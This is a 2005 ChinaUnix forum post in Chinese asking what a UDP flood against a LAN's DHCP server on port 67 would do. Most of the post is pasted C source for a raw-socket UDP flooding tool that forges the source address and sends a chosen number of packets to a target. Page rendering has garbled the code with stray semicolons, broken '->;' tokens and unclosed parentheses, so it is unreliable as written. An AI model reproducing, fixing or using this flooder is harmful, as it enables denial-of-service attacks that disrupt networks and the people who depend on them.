免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1439 | 回复: 0
打印 上一主题 下一主题

关于DHCP server 的攻击 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-10-05 22:37 |只看该作者 |倒序浏览
假如在一个局域网内,有一台DHCP server. 有人用udp flood程序攻击这台server的67udp 端口,会有多大的后果?网络会瘫痪吗?
以下是那个udp flood的源程序.
#include<sys/types.h>;
#include<sys/socket.h>;
#include<netinet/in_systm.h>;
#include<netinet/in.h>;
#include<netinet/ip.h>;
#include<netinet/udp.h>;
#include<errno.h>;
#include<string.h>;
#include<netdb.h>;
#include<arpa/inet.h>;
#include<stdio.h>;

struct sockaddr sa;

main(int argc,char **argv)
{
int fd;
int x=1;
struct sockaddr_in *p;
struct hostent *he;
int numpackets;
u_char gram[38]=
        {
        0x45,   0x00,   0x00,   0x26,
        0x12,   0x34,   0x00,   0x00,
        0xFF,   0x11,   0,      0,
        0,      0,      0,      0,
        0,      0,      0,      0,

        0,      0,      0,      0,
        0x00,   0x12,   0x00,   0x00,

        '1','2','3','4','5','6','7','8','9','0'
        };

if(argc!=4)
        {
        fprintf(stderr,"usage: %s sourcename destinationname numpackets\n",*argv);
        exit(1);
        };

numpackets = atoi(argv[3]);
fprintf(stderr,"Will flood %d times",numpackets);

if((he=gethostbyname(argv[1]))==NULL)
        {
        fprintf(stderr,"can't resolve source hostname\n";
        exit(1);
        };
bcopy(*(he->;h_addr_list),(gram+12),4);

if((he=gethostbyname(argv[2]))==NULL)
        {
        fprintf(stderr,"can't resolve destination hostname\n";
        exit(1);
        };
bcopy(*(he->;h_addr_list),(gram+16),4);

*(u_short*)(gram+20)=htons((u_short)7);
*(u_short*)(gram+22)=htons((u_short)7);

p=(struct sockaddr_in*)&amp;
p->;sin_family=AF_INET;
bcopy(*(he->;h_addr_list),&(p->;sin_addr),sizeof(struct in_addr));

if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
        {
        perror("socket";
        exit(1);
        };

#ifdef IP_HDRINCL
fprintf(stderr,"\nWe have IP_HDRINCL \n\n";
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
        {
        perror("setsockopt IP_HDRINCL";
        exit(1);
        };
#else
fprintf(stderr,"\nWe don't have IP_HDRINCL \n\n";
#endif

printf("\nNumber of Packets sent:\n\n";
for(x=0;x<numpackets;x++)
{
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
        {
        perror("sendto";
        exit(1);
        };
printf("%d ",x);
}

}
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP